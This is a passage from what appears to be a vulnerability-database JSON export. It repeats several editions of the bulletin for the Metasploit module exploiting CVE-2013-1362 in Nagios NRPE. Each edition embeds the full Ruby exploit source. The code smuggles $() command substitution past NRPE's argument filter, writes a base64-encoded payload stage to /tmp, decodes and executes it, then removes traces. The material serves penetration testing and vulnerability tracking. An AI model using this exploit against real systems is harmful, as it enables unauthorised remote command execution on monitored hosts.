in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-04T14:57:49", "differentElements": ["modified", "published"], "edition": 43}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-06T09:01:25", "history": [], "viewCount": 70, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-06T09:01:25"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-06T09:01:25", "differentElements": ["modified", "published"], "edition": 44}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-06T10:58:24", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-06T10:58:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-06T10:58:24", "differentElements": ["modified", "published"], "edition": 45}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-12T13:14:35", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-12T13:14:35"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-12T13:14:35", "differentElements": ["modified", "published"], "edition": 46}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-12T15:23:42", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-12T15:23:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
